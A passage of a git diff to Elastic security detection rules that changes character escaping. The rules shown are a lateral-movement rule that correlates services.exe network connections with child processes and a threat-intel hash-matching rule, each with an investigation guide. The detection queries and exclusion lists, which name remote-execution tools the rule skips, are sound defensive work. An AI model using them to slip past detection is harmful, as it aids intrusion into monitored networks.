Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -112,7 +112,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json index 6160a615af0..b822c737106 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json @@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -113,7 +113,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json index 45c41528615..6ea5b837102 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_1.json @@ -237,7 +237,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json index ec09bb6ccb3..2b318037bf5 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_2.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or file.pe.imphash:* or process.hash.*:* or process.pe.imphash:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -225,7 +225,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json index 77a31adec3f..7292795d24f 100644 --- 